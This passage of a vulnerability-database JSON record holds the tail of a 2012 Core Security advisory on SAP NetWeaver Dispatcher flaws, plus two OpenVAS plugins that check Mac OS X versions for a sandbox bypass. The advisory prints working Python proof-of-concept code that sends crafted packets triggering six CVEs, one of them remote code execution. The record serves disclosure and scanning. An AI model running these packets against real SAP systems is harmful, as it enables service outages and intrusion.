\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\r\n\tsupport_data = \"\\x10\\x04\\x0b\\x00\\x20\"\r\n\tsupport_data+= \"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\r\n\tsupport_data+= \"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\tdpheader = \"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n\tdpheader+= struct.pack(\"I\", len(diagheader + user_connect + support_data))\r\n\tdpheader+= \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n\tdpheader+= \"terminalXXXXXXX\"\r\n\tdpheader+= \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\tsend_packet(sock, dpheader + diagheader + user_connect + support_data)\r\n\r\ndef send_message(sock, message):\r\n\tdiagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\tstep = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\r\n\teom = \"\\x0c\"\r\n\tsend_packet(sock, diagheader + step + message + eom)\r\n\r\n# Connect and send initialization packet\r\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnection.connect((options.hostname, options.port))\r\ninitialize(connection)\r\nreceive(connection)\r\n\r\n# Choose one of the following and comment the others\r\n\r\n#[CVE-2012-2611] \r\ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\r\ncrash+= \"Y\"*32\r\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2612] \r\ncrash = 
\"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2511]\r\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2512] \r\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2513]\r\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2514]\r\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\r\nsend_message(connection, crash)\r\n\r\nIn the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.\r\n\r\n8.1. SAP Netweaver DiagTraceR3Info Vulnerability\r\n[CVE-2012-2611] The vulnerability can be triggered when SAP Netweaver disp+work.exe module process a specially crafted network packet. Malicious packets are processed by the vulnerable function DiagTraceR3Info in the disp+work.exe module when the Developer Trace is configured at levels 2 or 3 for the \"Dialog processor\" component of the \"Dialog\" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the \"Dispatcher\" service. The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\r\ncrash+= \"Y\"*32\r\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\r\nsend_message(connection, crash)\r\n\r\n8.2. SAP Netweaver DiagTraceHex Denial Of Service Vulnerability\r\n[CVE-2012-2612] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceHex in the disp+work.exe. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. 
The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\r\nsend_message(connection, crash)\r\n\r\n8.3. SAP Netweaver DiagTraceAtoms Denial Of Service Vulnerability\r\n[CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceAtoms. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\r\nsend_message(connection, crash)\r\n\r\n8.4. SAP Netweaver DiagTraceStreamI Denial Of Service Vulnerability\r\n[CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceStreamI and could allow a remote unauthenticated attacker to conduct a denial of service attack.\r\n\r\n\r\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\r\nsend_message(connection, crash)\r\n\r\n8.5. SAP Netweaver Diaginput Denial Of Service Vulnerability\r\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable function Diaginput, allowing a denial of service attack against the vulnerable systems.\r\n\r\n\r\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\r\nsend_message(connection, crash)\r\n\r\n8.6. SAP Netweaver DiagiEventSource Denial Of Service Vulnerability\r\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable function DiagiEventSource in the disp+work.exe module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.\r\n\r\n\r\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\r\nsend_message(connection, crash)\r\n\r\n9. 
Report Timeline\r\n2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012.\r\n2012-01-24: Core sends an advisory draft with technical details.\r\n2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline.\r\n2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible.\r\n2012-02-21: First release date missed.\r\n2012-02-22: Core asks for the status of the fix and notifies that the release date was missed.\r\n2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012.\r\n2012-02-23: Core re-schedules the advisory publication to May 8th.\r\n2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix.\r\n2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed.\r\n2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received).\r\n2012-05-07: Core asks again for the status of the fix.\r\n2012-05-08: SAP notifies that they have 
released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8].\r\n2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information.\r\n2012-05-08: Advisory CORE-2012-0123 published.\r\n2012-05-10: ERRATA: CVE-2011-1516 changed to CVE-2012-2611. CVE-2011-1517 changed to CVE-2012-2612.\r\n10. References\r\n[1] http://www.sap.com/platform/netweaver/index.epx\r\n[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\r\n[3] SAP's legal information, terms and conditions \r\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \r\n[4] SAP security note 1687910 \r\nhttps://service.sap.com/sap/support/notes/1687910. \r\n\r\n11. About CoreLabs\r\nCoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.\r\n\r\n12. About Core Security Technologies\r\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. 
Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.\r\n\r\n13. Disclaimer\r\nThe contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n14. PGP/GPG Keys\r\nThis advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20705/"}], "openvas": [{"lastseen": "2017-07-19T10:51:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1516", "CVE-2008-7303"], "description": "The host is installed with Apple Mac OS X operating system and\n is prone to sandbox profiles security bypass vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2013-02-01T00:00:00", "id": "OPENVAS:803223", "href": "http://plugins.openvas.org/nasl.php?oid=803223", "type": "openvas", "title": "Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_macosx_sandbox_profiles_sec_bypass_vuln.nasl 6521 2017-07-04 14:51:10Z cfischer $\n#\n# Apple Mac OS X Predefined Sandbox Profiles Security Bypass 
Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to gain unauthorized\naccess to restricted network resources through the use of Apple events.\n\nImpact Level: Application\";\n\ntag_affected = \"Apple Mac OS X version 10.5.x through 10.7.2\";\n\ntag_insight = \"The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox\nprofiles fails to propagate restrictions to all created processes, which\nallows remote attackers to access network resources via apple events to\ninvoke the execution of other applications not directly restricted by\nthe sandbox.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. 
Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"The host is installed with Apple Mac OS X operating system and\n is prone to sandbox profiles security bypass vulnerability.\";\n\nif(description)\n{\n script_id(803223);\n script_version(\"$Revision: 6521 $\");\n script_cve_id(\"CVE-2011-1516\", \"CVE-2008-7303\");\n script_bugtraq_id(50644, 50716);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 16:51:10 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-01 12:42:10 +0530 (Fri, 01 Feb 2013)\");\n script_name(\"Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/48980\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/71284\");\n script_xref(name : \"URL\" , value : \"http://www.coresecurity.com/content/apple-osx-sandbox-bypass\");\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"pkg-lib-macosx.inc\");\n\n## Variable 
Initialization\nosName = \"\";\nosVer = \"\";\n\n## Get the OS name\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit (0);\n}\n\n## Get the OS Version\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\n## Check the affected OS versions\nif(version_in_range(version: osVer, test_version:\"10.5.0\", test_version2:\"10.7.2\")){\n security_message(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1516", "CVE-2008-7303"], "description": "The host is installed with Apple Mac OS X operating system and\n is prone to a sandbox profiles security bypass vulnerability.", "modified": "2019-05-22T00:00:00", "published": "2013-02-01T00:00:00", "id": "OPENVAS:1361412562310803223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803223", "type": "openvas", "title": "Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803223\");\n script_version(\"2019-05-22T12:34:41+0000\");\n script_cve_id(\"CVE-2011-1516\", \"CVE-2008-7303\");\n script_bugtraq_id(50644, 50716);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 12:34:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-02-01 12:42:10 +0530 (Fri, 01 Feb 2013)\");\n script_name(\"Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.[5-7]\\.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/48980\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/71284\");\n script_xref(name:\"URL\", value:\"http://www.coresecurity.com/content/apple-osx-sandbox-bypass\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to gain unauthorized\n access to restricted network resources through the use of Apple events.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.5.x through 10.7.2.\");\n\n script_tag(name:\"insight\", value:\"The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox\n profiles fails to propagate restrictions to all created 
processes, which allows remote attackers\n to access network resources via apple events to invoke the execution of other applications not\n directly restricted by the sandbox.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Apple Mac OS X operating system and\n is prone to a sandbox profiles security bypass vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(osVer =~ \"^10\\.[5-7]\\.\" && version_in_range(version:osVer, test_version:\"10.5.0\", test_version2:\"10.7.2\")) {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"WillNotFix\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}]}